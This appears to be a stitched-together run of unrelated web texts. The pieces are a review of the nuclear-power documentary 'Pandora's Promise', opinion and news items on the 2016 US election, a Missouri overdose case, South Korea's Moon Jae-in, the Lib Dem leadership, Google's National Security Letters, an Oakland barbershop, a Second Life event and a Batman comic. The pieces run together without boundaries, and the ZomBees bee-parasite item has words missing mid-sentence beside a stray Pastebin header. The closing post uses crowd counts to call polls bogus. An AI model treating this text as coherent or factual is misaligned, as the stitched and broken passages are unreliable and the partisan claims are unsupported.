Faced with the near-term catastrophe of climate change and the planet-poisoning effects of fossil fuels , is the environmental movement changing its tune on nuclear energy ? It 's not a new question , and let 's be clear that the short answer is still no – or mostly no . You ca n't find one major environmental organization , from activist groups like Greenpeace to mainstream conservation groups like the Nature Conservancy or the National Audubon Society , that has come out publicly in favor of nuclear power .
But there is also a longer and more complicated answer to the question , which is that many people who have long been skeptical about the safety , economic feasibility and ultimate morality of nuclear power are now somewhat willing to consider the argument that , at least in the medium term , we ca n't do without it . This is partly also an argument about whether you think the continued development of human society can be separated from the health of the planet as a whole , and about whether people in the developing world have an inherent right to enjoy the energy-guzzling standard of living most of us in the global North take for granted .
Advertisement :
Perhaps the pithiest form of this argument was made by climate-change activist and author Mark Lynas in an explosive Op-Ed for the Guardian last September : “ Without nuclear , the battle against global warming is as good as lost. ” Building lots and lots of new nuclear reactors , Lynas and others have argued , offers us our last and best hope to generate enough low-cost , low-carbon energy to tackle the immediate climate crisis without devastating damage to the planetary ecosystem , human society or both .
Lynas , one of the key figures in Robert Stone 's controversial new pro-nuke documentary “ Pandora 's Promise , ” has become something of a radioactive personality ( sorry ! ) within the environmental community . He now defines himself as a “ pro-science environmentalist ” -- clearly implying that other environmentalists are against science – and has also renounced his long-standing opposition to genetically modified crops . But Lynas ' heretical positions , whatever you make of them , stem from genuine conviction . There 's no evidence that he 's operating in bad faith or taking bribes from the nuclear industry or whatever . Even the left-leaning journalist Mark Hertsgaard , a forceful opponent of nuclear power who has written two articles for the Nation seeking to debunk “ Pandora 's Promise , ” makes clear that he respects Lynas and believes he is sincere .
Very few prominent environmental activists – indeed , almost none -- have become staunch proponents of nuclear power to the degree Lynas has . But a great many people in the green world have begun talking about the issue , in public and in private , and in that sense Lynas is the tip of the iceberg . One of Hertsgaard 's responses to “ Pandora 's Promise ” comes in the form of a searching , moving and intelligent dialogue with author and activist Terry Tempest Williams , who was raised in Utah and believes her family 's extensive history of cancer resulted from living downwind from the Nevada Test Site , where nuclear weapons were detonated . Even given that personal background , and even in the context of a conversation that is generally critical of “ Pandora 's Promise , ” Williams admits that the film 's perspective challenged her thinking , after 30 years of anti-nuclear activism :
This crack in my own thinking is heightened by the fact that I am now watching my extended community of plants , animals , rocks , rivers and human beings be ravaged by the oil and gas industry , be it fracking or the razing of vulnerable wildlands . For me , this film 's strength was not that it changed my mind , which it did not , but that it expanded it . I am interested in having an open conversation about nuclear energy . We know we must wean ourselves off fossil fuels . So what are the alternatives ? Are renewable energy sources enough for the energy-poor around the world ?
My own perspective is similar : “ Pandora 's Promise ” often feels like a maddeningly one-sided and tendentious film -- Robert F. Kennedy Jr. has described it as `` an elaborate hoax '' -- and it did not succeed in quelling my doubts about nuclear power . Like so many leftists raised in the ‘ 60s , ‘ 70s and ‘ 80s , I was weaned on anti-nuke activism , schooled by “ Silkwood ” and “ The China Syndrome , ” and terrified by Three Mile Island and Chernobyl . But it also reminded me that every aspect of the scientific , social and environmental debate around nukes is complicated and clouded by ideology , and that the issues are exceptionally difficult for laypeople to parse . ( How many people have died as a result of the Chernobyl disaster ? It depends on whom you ask : Somewhere between a few dozen and a few hundred thousand . )
It 's too easy to become entrenched in a mean-spirited cultural dispute between Gaia-worshiping tree-huggers and technophile science geeks who can barely speak the same language , and it behooves us all to come back to this issue , as Williams does , with fresh eyes and an open mind . So while I think Hertsgaard is right that “ Pandora 's Promise ” largely rehashes pro-nuclear talking points that have been around for 30 years or more , it 's also an important conversation-starter on a topic no concerned citizen of Earth can afford to ignore .
Stone paints compelling portraits of a number of prominent environmentalists who have switched sides on nuclear power : Along with Lynas , there is also Whole Earth Catalog founder and sustainability pioneer Stewart Brand , nuclear-age historian Richard Rhodes , author and journalist Gwyneth Cravens and “ eco-pragmatist ” policy wonk Michael Shellenberger . These are serious and intelligent folks , but there 's nothing especially surprising about their position ; only Lynas would qualify as an activist whose work falls outside the political mainstream . Indeed , several of these people have long been associated with Shellenberger 's think tank , the Breakthrough Institute . ( In the first published version of this story , I erroneously reported that Microsoft co-founder Paul Allen , who produced this film , had also funded Shellenberger 's institute . That 's apparently not true . )
Advertisement :
But “ Pandora 's Promise ” goes much further than that , drawing an outrageous parallel between anti-nuclear activists and climate-change deniers , by painting both as anti-scientific or unscientific zealots . ( Terry Tempest Williams resents this in particular : “ My eyes have been opened by death , not fear , and I remain a respecter of science and a seeker of facts. ” ) It also gives exceedingly short shrift to all possible non-nuclear pathways to a sustainable energy future . Wind , solar and geothermal are “ a hallucinatory illusion , ” Shellenberger says , too marginal and unreliable to help us any time soon . ( Hertsgaard argues that the pace of innovation in those fields renders this an outdated view . ) Even the universally acceptable goal of energy efficiency , which mainstream management consultants have suggested could reduce American energy consumption by somewhere between 20 and 50 percent , is a chimera that will only lead to more energy being used in other places .
And while presenting most forms of non-carbon renewable energy as unrealistic pie in the sky , “ Pandora 's Promise ” argues in favor of an entirely new generation of breeder reactors based on the long-canceled Integral Fast Reactor , or IFR . Such Generation IV reactors might or might not be a good idea – in principle , they can reuse nuclear waste as fuel almost indefinitely – but they would require enormous up-front investment ( likely $ 10 billion to $ 12 billion apiece ) , they remain largely theoretical and they do not currently exist or operate anywhere on the planet . As Hertsgaard and others have observed , the film never mentions the massively expensive Superphoenix plant in France , an infamous white elephant of similar design that operated normally for just 63 months of its 11 years online , or the even more ludicrous example of the Monju plant in Japan , a prototype fast-breeder reactor that has produced exactly one hour of electricity in 17 years and was the site of a major accident and coverup in 1995 .
Indeed , one can concede many of the film 's central points , at least for the sake of argument , without concluding that nuclear power is a good idea . It 's useful to be reminded that nuclear plants are demonstrably less dangerous to human life or the environment than the coal-fired variety , whose pernicious effects kill people in the tens or hundreds of thousands every year . Outside the worst-case scenario that occurred at Chernobyl , the number of people who have died as a direct result of nuclear accidents , while unknown and unknowable , is smaller by many orders of magnitude . ( Stone rather cruelly mocks veteran activist Helen Caldicott for alleging that Chernobyl caused a million deaths , but he 's correct that that 's an unsupportable claim . ) The oft-repeated factoid that all the nuclear waste ever produced could be stacked a few meters deep on a football field is apparently accurate . But no one would want to live within 20 miles of that stadium – much of that waste must be isolated from contact with human beings or the organic environment for millennia to come .
I recommend watching `` Pandora 's Promise , '' but I also recommend reading the Hertsgaard-Williams exchange in the Nation , which sums up the fundamental issues , from an environmental perspective , even more clearly . Then move on to the comments section of that article , which features a fair amount of reasonable debate , some ad hominem invective , a few wild claims about cold fusion and perpetual-motion machines and one person explaining that “ the Earth is just a rock , and one the human race must eventually abandon if we are to continue to survive as a species. ” I 'm not sure that 's exactly the kind of support that Lynas , Brand , Shellenberger and other pro-nuke environmentalists are looking for , but you could describe it as an extreme example of the philosophical conflict that Terry Tempest Williams sees beneath this issue .
Advertisement :
Advocates for nuclear energy , whether they call themselves environmentalists or not , are urging us to place an enormous financial , cultural and political bet on untested technology that most progressives and environmentalists around the world have long seen as deadly and dangerous . Many of those advocates earnestly believe that we have no other realistic choice , and that the only available alternative is to scorch the planet to cinders by burning oil and coal at an ever-accelerating rate . I hope , and believe , that is n't true . But I also think we are obligated to pursue what Williams calls an open conversation about “ new strategies for nuclear energy , ” aimed at answering this question : “ What energy sources can we employ that do the least harm to life on earth and at the same time can meet the expanding needs of the human family ? ”
In posing that question seriously , we also must approach what Williams calls a philosophical “ fracture line ” within the green movement . On one side are those who believe in more technology and more development , including nuclear energy , as the human population continues to grow . She sums up the case this way : “ The energy-poor deserve what we have in places like the United States and Europe . There is no turning back . We have no historical evidence of stopping the arrow of progress . ”
I find that a persuasive moral argument , but so too is the one on the other side of the fracture line , which Williams describes as more restrained and “ less human-centered … seeing ourselves as a species among a cacophony of other species , interdependent and interrelated , where what is called for is not new technology but a new planetary consciousness. ” In that context , we may still have a moral responsibility to ensure that people in Brazil and India can have air conditioning – but we have to find a new way to provide it . Maybe nuclear is the future , maybe it can provide a bridge to the future , and maybe it 's a risky and dangerous technology with no future . But we have to face the nuclear dilemma honestly , and right now , while it 's still halfway possible that we might leave our grandchildren a decent place to live .
Advertisement :
`` Pandora 's Promise '' is now playing in Charlotte , N.C. , Dallas , Los Angeles , New York , Portland , Ore. , San Francisco and Austin , Texas . It opens June 28 in Charlottesville , Va. , and San Jose , Calif. ; July 5 in Phoenix ; and July 12 in Salt Lake City and Santa Fe , N.M. , with other cities , home video and CNN broadcast to follow .
One of the problems in predicting the US presidential elections this time is the entry of Donald Trump . Nobody thought the Republicans would make him their presidential candidate , but that is exactly what he is . At the Republican convention last week , many of the powerhouses of the party failed to turn up – John McCain , Mitt Romney , the three Bushes ( George W , George HW , and Jeb ) , John Kasich , and Lindsey Graham – and those who did ( Ted Cruz ) failed to endorse Trump .
The roll-call of absent past presidents and recent presidential hopefuls tells us that the GOP is deeply divided . It is easy to convince yourself that if top Republicans refuse to back Trump , he will lose to Hillary Clinton in November . Clinton may not be liked in her party , but Trump is disliked more in his .
Not surprisingly , many commentators are forecasting not only a Clinton win , but a clean sweep ( read here and here ) . Back home , Times of India columnist Swaminathan Aiyar has predicted that “ Trump will not just lose , he 'll be thrashed. ” His prediction is based on the assumption that more Trump-haters in the Republican camp will stay at home on election day than Hillary-haters among Democrats .
Advertisement
That 's rash , for even America 's poll pundits are keeping their fingers crossed . Nate Silver , who runs the fivethirtyeight portal on electoral math , said in a tweet after the Republican National Convention : “ Do n't think people are really grasping how plausible it is that Trump could become president . It 's a close election right now . ”
Silver points out that from huge leads of six or seven percentage points in June , Trump closed the gap to just three points . Three percent can be explained by sampling errors , and this is not due to any “ convention bump ” – the phenomenon where candidates get a lift in their popularity ratings around the time of their party conventions . Trump was closing the gap even before the Republican convention . In the run-up to the convention , at least three polls showed Trump marginally ahead of Clinton . Among them : LA Times/USC , which showed Trump ahead 45-42 , Gravis ( 51-49 ) , and Rasmussen ( 43-42 ) .
While Real Clear Politics , another election website that tracks poll trends and averages them out to indicate the broader direction of public sentiment , shows a 44.6-42.7 percent tilt in favour of Clinton , in America 's electoral college-determined elections , this may not be enough to guarantee victory . The fight is likely to go down to the wire and will be won in a few battleground states . Real Clear Politics predicts that , as of today , Clinton can be reasonably sure of 209 electoral votes and Trump of 164 , with 165 votes in the “ toss-up ” category . The winner needs 270 electoral votes .
Advertisement
The key states in the toss-up category are Florida ( 29 electoral votes ) , Pennsylvania ( 20 ) , Ohio ( 18 ) , Georgia ( 16 ) , North Carolina ( 15 ) and Virginia ( 13 ) . Clinton 's choice of Senator Tim Kaine of Virginia as her Vice-President candidate is said to have been determined by the need to get at least one of the undecided states in her favour .
However , the reason why Trump can not be written off has nothing to do with what the number-crunchers have to say about his chances of winning . This election is not a conventional one that will test two parties and their candidates against a set presidential template . It is different .
Here 's why .
Advertisement
First , Trump is not a traditional Republican candidate . In fact , it would be truer to say that he is the anti-establishment candidate , an outsider who has established his independence from power blocs and projected himself as the “ voice ” of voters who have lost faith in both parties . So even though major Republican leaders have cold-shouldered him , he may be garnering votes from across the aisle , from both disaffected Republicans and Democrats .
And he is moulding the Republican party in his own image . Writing in The National Interest , Robert Merry says Trump has captured the Republican party and is taking it in new directions “ based upon a new vision of political opportunity spawned by fast-changing national and global realities . Trump made clear that , if elected , he will govern as no Republican has governed before . And , if he is defeated , he still has redefined the party . Like ( Barry ) Goldwater , he is far more than a mere radar blip . There will be no going back . ”
Trump 's policies steer clear of the economic Right and the Christian Right , key constituencies in the Republican party . He seems to be less in favour of free-market and free-trade than his party . On terror , immigration and law and order , he is further to the right than his party . But on social issues , and trade , he is to the left of his party .
Advertisement
Trump has effectively redefined the party . This was obvious when he got gay businessman Peter Thiel to speak at his convention , and talked of his own support for the LGBTQ community , which was targeted by a gunman at Orlando last month . He wants to build walls to keep illegal immigrants out , and also wants to tear up multilateral free-trade agreements , preferring to do “ individual deals with individual countries. ” He also appealed to the country 's isolationist streak when he said America will not send its soldiers to fight foreign wars , or to indulge in “ nation-building ” . He is also less anti-Putin than America has been so far , suggesting that he is moving America out of its Cold War rhetoric .
Second , we are vastly underestimating the impact recent incidents of Islamist terror , both in Europe and on American soil . American invulnerability to terror has now been shattered with several incidents from Orlando to San Bernardino to Boston . So , when Trump caters to the fear psychosis engendered by terrorism , he will surely tap into both the Christian right 's basic Islamophobia and the increasing sense of vulnerability Americans feel about terrorism . Barely a fortnight passes without some terrorist attack surfacing in Europe or America . Obama 's soft approach to Islamist terror will be seen as Hillary Clinton 's vulnerability , and Trump will surely drive home his advantage .
Third , it is necessary to discount media assumptions about Trump 's unelectability . Remember , the American media – like India 's – tends to be liberal-biased , and Trump is on their hate list . So when American columnists write him off , it is entirely possible that they are indulging in wishful thinking .
Advertisement
The liberal media could n't predict Brexit , could n't see the Modi wave , and is still in denial of the Right-wing surge across Europe .
Their antipathy to Trump may thus not be indicative of the underlying sentiment in the country . It is worth noting that the American voter has grown tired of mainstream political parties , and , right now , Trump is the only one who represents a shift from the elite consensus of the past that has landed America in an economic mess .
So , do n't discount the possibility of President Donald Trump .
Authorities in southwest Missouri say Chelsie Berry and Jared Prier posed for a selfie with the body of a friend who died from a drug overdose .
Berry , 24 and Prier , 26 , are charged with voluntary manslaughter and abandonment of a corpse in the death of 30-year-old Dennis `` Nathan '' Meyer .
Chelsie Berry ( left ) and Jared Prier .
The pair was taken into police custody on Wednesday , after a tipster alerted police to Facebook photos that allegedly show Berry and Prier posing with Meyer 's body , police said .
`` He appeared certainly to be deceased , '' Newton County Sheriff Ken Copeland told News Talk KZRG of at least one of the selfies .
According to a probable-cause affidavit obtained by The Smoking Gun , Berry told police she was hanging out with Meyer on the night of August 21 , when he injected himself with the painkiller Dilaudid , a narcotic pain reliever .
`` Chelsie stated that Nathan shot the Dilaudid up into his vein and started acting 'crazy ' by pulling his penis out and saying strange things , '' the arrest affidavit reads .
Berry told police Meyer 's bizarre behavior made her nervous , so she called Prier , who met up with them a short time later . Berry , according to the affidavit , said she hung out in the parking lot of a McDonald 's restaurant , while Myer was “ passed out ” in the vehicle they were using .
The trio later drove to a convenience store , at which time they allegedly checked on Meyer and discovered he was not breathing , police said .
Berry allegedly told police she was afraid to call an ambulance for Meyer because she and Prier were `` high on meth and Xanax . ''
Instead of getting help , the pair posed for a “ selfie ” with Meyer before moving his body from the front seat to the back seat , `` because they did not want to look at him any longer and also the fact that he began to smell bad , ” the affidavit states .
Berry allegedly told police they drove around `` looking for a place to dump the body , '' before eventually settling on the rural Newton County driveway , where it was later found .
The arrest affidavit states the coroner determined Meyer 's `` breathing would have been faint '' in the hours leading up to his death and that it `` would have taken a while '' for him to die .
According to Missourinet.com , authorities are still trying to determine Meyer 's official cause of death , but drug overdose has been referenced as a possible cause .
TD420blazeit LostmyDogPleaseHelp Dec 22nd , 2015 ( edited ) 2,075 Never 2,075Never
Not a member of Pastebin yet ? Sign Up , it unlocks many cool features !
RAW Paste Data
Interested in bee health ? Still itching for more after the
? Not afraid of zombies ? Get ready for ... ZomBees .
Another
team , unaffiliated with the
, needs help from
to track the spread of a honey bee parasite that could be partially responsible for
.
So far , no parasitized bees
in the state of Oregon . That status could change , however . The parasitic fly responsible for infections has been found in northern California less than 10 miles from the Oregon border , as well as on Vancouver Island in British Columbia .
A parasitic fly called
lays its eggs in living bees , making them involuntary incubators for its offspring . The eggs hatch while the bee is still alive , and maggots start to feed on it from the inside . The bee leaves its hive , dies , and eventually the maggots eat their way out of the bee and grow up .
To help , the team is asking people to collect bees in jars . Once bees are infected , they become disoriented and head toward lights at night . You can set up a `` light trap '' at home , or simply collect any bees that you find beneath a porch light or street light in the morning .
The team strongly discourages anyone from touching bees , alive or dead , with bare hands . Using tweezers or another tool , collect the bee in a resealable container for up to 14 days to check for the emergence of pupae , immature parasitic flies . They ask you to submit photos of the bee carcass ( pupae or not ) to help them track the spread of the fly .
To submit photos of ZomBees you 've collected and for
to make a light trap :
.
--
SEOUL ( Reuters ) - South Korean human rights lawyer Moon Jae-in won the liberal Democratic Party primary vote on Monday , setting him on course to become the next president and perhaps take a softer line on North Korea .
Moon Jae-in reacts after winning the nomination as a presidential candidate of the Minjoo Party , during a national convention , in Seoul , South Korea , April 3 , 2017 . REUTERS/Kim Hong-Ji
Moon has been leading in opinion polls ahead of the May 9 election to succeed impeached Park Geun-hye , who was dismissed last month over a corruption scandal involving family-run conglomerates , or chaebol .
If elected , Moon , 64 , is expected to soften South Korea 's policy toward North Korea , possibly delay deployment of a U.S. anti-missile defense system that has enraged China and get tough on corporate criminals , including chaebol bosses .
“ I will do everything I have to do to look after the failing standard of people 's living , revive the economy and resurrect national security that 's been riddled with holes , ” Moon told an enthusiastic party crowd in his acceptance speech .
In a major policy statement in March , Moon said there was no choice but to recognize Kim Jong-un as the leader of reclusive North Korea and deal with him .
North and South Korea are technically still at war because their 1950-53 conflict ended in a truce , not a peace treaty . The North , heavily sanctioned for missile and nuclear tests in breach of UN Security Council resolutions , regularly threatens to destroy the South and its main ally , the United States .
“ We ca n't deny that the ruler of the North Korean people is Kim Jong-un . We have no choice but to recognize Kim Jong-un as a counterpart , whether we put pressure and impose sanctions on North Korea or hold dialogue , ” Moon said .
Such an approach may clash with the United States where President Donald Trump has pressed China to do more to rein in the North , and said it may have to deal with Pyongyang 's nuclear and missile programs on its own if needs be .
Moon has also vowed to end the practice of pardoning convicted corporate criminals and to break up the cozy relationship between big business and the government .
Samsung Group leader Jay Y. Lee is on trial on charges including bribery in return for favors to the conglomerate that has led to the arrest of ousted president Park .
Moon had the backing of 40 percent of the people in a Gallup Korea poll released on Friday , a double digit advantage over Ahn Cheol-soo of the new centrist People 's Party .
The two face little in the way of a significant challenge from conservatives , who have 14 percent combined public support according to the Gallup Poll , or the far left .
Bradley Roberts picks up a straight-edge razor and leans over his client . The barber 's indigo sleeves are rolled up to expose a map of tattoos that continue even beneath his salt and pepper beard . With precision and focus , he slides the blade along a lathered cheek with a long even stroke . He wipes the metal edge clean and starts again .
“ The element of danger is there , ” Roberts says , laughing ; shaving with a sharp blade requires considerable skill and expertise . And despite the advent of disposable razors , the straight shave provides a nostalgic ritual that “ just feels amazing , ” he says . He shaves every client twice to make sure they get the coveted baby face effect , first letting hot towels soften the beard hairs .
But the allure of visiting the barbershop goes beyond simple aesthetics .
“ Cutting hair is only 10 percent of what I do , ” says Nick Vlahos , Roberts ' business partner and a born-and-raised Oaklander . Traditionally , the barbershop was an important gathering place to hear the latest community news , to be able to seek counsel , and to complain about significant others . ( In San Francisco during Prohibition , it was also one of the few spots where men could sneak a drink and possibly play cards . )
Their one-room business , the Temescal Alley Barbershop , off 49th and Telegraph , is only about six months old , but is steeped in classic male grooming customs ( minus the gambling ) . The owners commonly offer a nip of whiskey or a High Life to a rotating cast of neighborhood characters . Many of the clients who stop by are young , perhaps a reflection of the changing Oakland neighborhood , and a growing niche for small businesses that cater to them .
To Roberts , the return to old-school craftsmanship , whether it 's a haircut in his shop or a custom-tailored pair of pants , might also signal a resurgence of the local economy and consumer willingness to pay for quality goods . Despite the recession , he says—or perhaps due to it—people want to know where and to whom their money is going .
At 11 am on an overcast Thursday morning , Vlahos and Roberts are holding court , an extra maroon upholstered chair planted between their stations . At the moment they are the shop 's only barbers . Hand colored photographs of Roberts 's great-great-grandparents survey a couple of clients waiting their turn , and Vlahos points to a framed black and white photo of his father leaning against a Piaggio scooter . The barber displays the same thick mop and dapper style .
Vlahos takes a moment between clients to smooth his own dark hair , studying the reflection of his neck hair in consternation . “ As long as your hair is tidy , you can have a big beard , ” Roberts schools him from the background .
The two barbers have taken a challenge not to cut their beards , and it 's been a running joke since New Years . “ We each have our strengths ( in the beard battle ) ” Roberts says . “ Nick has the mustache , but I have the beard. ” Vlahos smiles mischievously at Roberts . He says that he also has a secret weapon : Roberts ' wife , who might prefer that he surrenders the challenge . It 's a battle to see who succumbs to the razor first , and so far the beards are winning .
“ Should I also get my mustache trimmed ? ” Roberts 's client asks the room . He is sporting a closely buzzed head but a lumberjack 's chin . “ I 've been chewing it a lot lately. ” Another thickly bearded and tattooed advisor sitting on the couch urges him not to : “ That 's my male-on-male advice. ” The other patrons chuckle and the client opts to purchase a pocket-sized mustache comb instead .
A local furniture maker in his mid 30s sits down in front of Vlahos for a trim . He happily accepts a small shot glass of whiskey from the barbers ' wooden hutch before catching up on the latest news . Not much is taboo in their conversations , except religion . In addition to trying to prevent customers from feeling uncomfortable discussing contentious topics , Roberts is a self-described “ anarchist atheist ” and he says that Vlahos is a Roman Catholic .
Despite their differences , they say they are “ in it together , ” and have a deep-seated mutual respect for each other , which is evident as they talk about their business . Each barber keeps a hand-written tally of customers to make sure they are seeing roughly the same number , and neither competes for new clients walking in the door . Roberts appears with a cup of steaming coffee for Vlahos , who jokes , “ I spend more time with him then my wife . ”
It is Roberts 's turn to barber next , and his customer hangs up a dark jacket on the metal hook before sitting down for a haircut . He looks like a young professional , clean shaven but with longish limp light brown hair that falls into his eyes . He reaches into his pocket to show the barber an iPhone picture of the haircut he envisions . “ That 's a gentleman 's haircut , ” Roberts says upon closer inspection , pleased with the client 's choice .
The barber reaches for his tools : scissors , clippers , a comb . The buzzing of hair provides a background track to Willie Nelson 's signature crooning . Vlahos retrofitted a black RCA Victor radio with an iPhone jack , and a mix of primarily older tunes are on constant rotation .
Roberts explains that when he remodeled the compact space , he took a cue from classic East Coast barbershops , then imbued the space with California modernity . Douglas fir runs throughout the room , and provides a warm counterpoint to the otherwise stark lines . On the magazine table , a 1971 Playboy is stacked on top of Bukowski 's South of No North . And while the classic black and white tiled floor is a reproduction from a curling photo taken in the shop where Vlahos 's great-grandfather was also a barber , a modern dappled caramel and white cowhide rug displays a brand burnt into the skin .
Originally all of the small businesses lining Temescal Alley off 49th Street were stables for horse drawn cars on Telegraph Avenue and wagon mules that went through the Caldecott Tunnel . The area was famous for blacksmiths , and was an Italian haven where English was rarely heard . Now , few vestiges of its history as a commerce center remain .
A Marine veteran in his late 80s sits in one of the shop 's restored theatre seats , waiting for Vlahos to call him to his station . He is a regular at the shop , and drives a big gold Cadillac from Alameda to see Vlahos every other week or so . He also might be slightly hard of hearing , so the barbers raise their voices to ask warmly how he is doing . When it is his turn , the vet carefully places his dark blue and gold threaded USMC hat on the empty barber chair next to him .
Vlahos arranges a striped drape over the customer 's clothes , and starts to gently buzz away his pale gray stubble . The vet used to visit Vlahos at his old shop , and once appeared for a haircut the only time Vlahos was out sick . Not wanting to see anyone else , somehow the vet extracted the barber 's personal phone number from the shop owner and called him at home . “ Well , what do you want me to do now ? ” Vlahos remembers the vet grumbled over the phone .
He is one among a growing number of “ old-timers ” who still live in the neighborhood and have started noticing the hand-painted sign outside the shop . Many of them served in World War II . Some saw action in Korea and Vietnam , and have spent time in internment camps or military hospitals . Others have shared stories of being shot down in fighter planes , or witnessing surgeries performed without anesthesia and with broken glass .
Their stories are sparks from another era , flickering reflections of decades living in the Bay . “ It 's in his memories , and it will be into darkness when he dies , ” says Vlahos , sweeping up remnants of the vet 's haircut before another client strides in the door .
Media playback is unsupported on your device Media caption Tim Farron MP : `` We may not be able to change Britain from the top down - just for the moment - but we can change lives from the bottom up ''
Tim Farron is the new leader of the Liberal Democrats , the party has announced .
The former party president beat Norman Lamb in the contest to replace Nick Clegg , with 56.5 % of the votes cast .
The Westmorland and Lonsdale MP , whose victory was announced on Twitter , is to make his first public appearance as leader at a central London rally later .
`` Our job now is to turn millions of liberals throughout the UK into Liberal Democrats '' , he tweeted .
Mr Lamb , a care minister in the coalition government , offered his congratulations , saying Mr Farron would make a `` fantastic '' leader who championed social justice .
Mr Clegg tweeted : `` It 's a tough job but the best in politics . I know Tim will do us proud . ''
The new leader 's immediate task is to rebuild the Lib Dems after a disastrous general election that left the party with just eight MPs .
Who is Tim Farron ?
Image copyright Getty Images
The Newcastle University graduate joined the Liberal Party aged 16
He stood for Parliament four times before finally being elected in 2005
He has increased his majority from under 300 to more nearly 9,000 in the past 10 years
He voted against a rise in tuition fees in 2011
He did not serve in the coalition and was party president between 2011 and 2014
His heroes are Jo Grimond , Joe Strummer and CS Lewis
The Tim Farron story
Challenge facing the new Lib Dem leader
The Lib Dems said 56 % of members took part . A total of 33,897 votes were cast , with Mr Farron winning 19,137 of them .
Mr Farron , 45 , is popular with activists and was the bookies ' favourite to replace Mr Clegg .
But former leader Lord Ashdown and former deputy leader Vince Cable have recently criticised him .
Party president Sal Brinton said : `` Tim is a fantastic communicator and his energy , enthusiasm and passion will inspire and drive the Liberal Democrats back to winning ways . ''
Google Publishes Eight National Security Letters That Have Been Freed From Their Gag Orders
from the legislatively-enforced-transparency dept
Google has managed to lift gag orders on eight of the National Security Letters it 's received from the FBI over the last five years . In a blog post that thankfully provides more details than its last NSL `` release , '' Google notes that last year 's surveillance reform bill has a lot to do with it even being able to do this .
In 2015 , Congress passed the USA Freedom Act , which allowed companies like Google to make more granular disclosures about National Security Letters they receive . In addition , the Act restricts the use of indefinite gag restrictions that prevent providers from ever notifying customers or talking about the demands . The Department of Justice ( DOJ ) must now regularly review disclosure restrictions in NSLs and lift those that are no longer needed .
The last NSL announcement Google made was n't much of an announcement . The NSL was n't released and the company had very little to say about the single NSL , other than that the gag order had been lifted .
This release is better , in that there 's an actual release involved . All eight of the NSLs have been published . Most ask for name , address , and length of service for the targeted account holders . Two of them ( here [ PDF ] and here [ PDF ] ) , however , also ask for `` electronic communications transactional records for all accounts '' -- presumably email metadata , but could also cover records generated by other Google services , like Hangouts .
Google notes that the DOJ has published new guidelines for the handling of NSL gag orders , which mostly involves agents having the right boilerplate on hand when issuing one . The DOJ also gives itself a three-year window for gag order reviews , basically reflecting suggestions made by a DC federal judge presiding over a NSL gag order case . Fortunately , the USA Freedom Act allows recipients to challenge these orders every year , so no one really has to restrict themselves to the DOJ 's extended timetable .
NSLs are still the FBI 's favorite way to obtain identifying information from service providers . It issues thousands of NSLs every year and even uses the self-issued demand letters to route around rejections by the FISA court . That the agency issues so many is likely due to its ability to open investigations that are n't officially termed `` investigations . '' It 's able to open `` threat assessments '' and `` preliminary investigations '' without providing any substantive reason for doing so . During these preliminary stages , the FBI grabs every third-party record it can -- anything collectible without leaving a judicial paper trail . Add to that the fact that these pieces of paper come with federally-enforced silence by default , and they 're the perfect storm of opacity and unaccountability .
Filed Under : doj , fbi , national security letters , nsls , transparency , usa freedom act
Companies : google
Amazing how 3 months have passed by so fast…the first round of Enchantment in SL ended – with the lovely theme of Snow White – and on 1st February a new round will start , this time featuring Little Red Riding Hood !
Now I usually do not cover events much , for the products that is , but Enchantment and the fairy tales themes are just so wonderful !
Little Red Riding Hood is of course all about red dresses , gowns , cloaks – but there is more . A nice variety of poses , accessoires , shoes , decorations and hair , to either dress yourself up as a real Lil Red or combine them and create your own fantasy look .
The sim is filled with trees , and I do recommend a visit to Grandmother 's house which is so wonderfully decorated by Britain Kennedy !
Awesome for pics !
I have been shopping a bit .. ahem , as I have preview access , so here is my sneak preview ( credits at end of the post ! ) .
Credits :
* Red gown Blanchette by MiaMai
* Red Cloak by [ S ]
* Axe + pose ( comes in more varieties and is for men – woodsmen , so some adjustment of Axe was needed ) by Captivity Co .
* Running Scared pose by Infiniti
* Pose used in last picture is by An Lar
– Amor worn on picture with axe is from Death Row Designs , not on Enchantment
Comic-Con might be over , but we 're still getting plenty of big comic news . In a interview with GameSpot , Tom King revealed the next arc for his hit comic series will be called ‘ I Am Suicide . ' The book will feature Batman creating his own Suicide Squad from Arkham Asylum 's gallery of rogues and using them to accomplish “ an impossible task ” . We do n't know what the task is just yet , but it will follow the upcoming crossover ‘ Night of the Monster Men ' . Fans of John Ostrander 's run on Suicide Squad will be glad to hear that Tom King is also a big fan and is inspired by the run .
For people who have been keeping up with their Bat-books , the idea behind this next arc might sound a little familiar .
The current run of Detective Comics actually features Batman putting together a team as well . Although it 's not a team of villains ( Well , there 's one villain on the team ) , it seems like the basic idea between the two is the same . Batman 's Detective Comics team consists of Red Robin , Spoiler , Clayface , Batwoman , and Orphan .
Apart from Detective Comics , Batman 's next arc will be hitting the same beats as another DC comic : Suicide Squad .
Nevertheless , I 'm excited to see Tom King 's take on a team of villains and hopeful that it will be unique enough to stand apart from the others .
Related
IT 'S A MOVEMENT= > TRUMP Has 10 TIMES the Number of People at His Events than Hillary Does at Her Events
Guest Post by Joe Hoft
As previously noted , biased polls reporting Democratic Presidential Candidate Hillary Clinton beating Republican Candidate Donald Trump can not be accurate .
Thanks to social media there is more and more evidence that the polls are way off .
It is clear by just looking at Trump and Clinton crowds at their events that Trump has a movement while Clinton has barely a heartbeat .
Now there is more evidence that proves that Trump is crushing Hillary in the race for the White House .
When you look at the number of individuals at both Trump and Hillary speaking events since August 1st , the numbers are very clear . Trump had nearly ten times the number of people that Hillary had since August 1st .
At least 100,000 people have shown up for Trump events ( many were turned away due to the events reaching capacity ) since the beginning of the month .
Hillary on the other hand has n't even had one tenth of that or 10,000 show up at her events since August 1st .
Trump 's largest event was in Ft Lauderdale , Florida , a few days ago where it was estimated that the crowd there to see him was nearly 20,000 . The largest event Hillary saw this month was in Washington , DC but this was a NABJ/NAHJ Event that Hillary was invited to speak at which had 4,000 in attendance . Hillary 's largest event held by her campaign in August was back on August 1st in Omaha , NE when businessman Warren Buffett joined her and an estimated 3,000 locals . In total when looking at just the Clinton events , barely 8,000 people showed up to her seven campaign events since August 1st .
( Note that these numbers are somewhat difficult to come by and the Clinton campaign in at least one event stated that the crowd was much bigger than was reported elsewhere . However , the Clinton campaign , like Hillary , can not be trusted and the better estimate was used in these totals . )
Trump also has more twice the number of events since the beginning of the month . This may be related to Hillary 's reported health issues which may limit her ability to work as hard as Trump .
Also , as previously noted Trump is destroying Clinton on social media .
Do n't believe what the main stream media or the bogus polls tell you , Trump is crushing Hillary in attendance at events as seen in pictures and now in numbers .
It is clear that a large group of Americans are sick and tired of the main stream media and are voting for Trump .
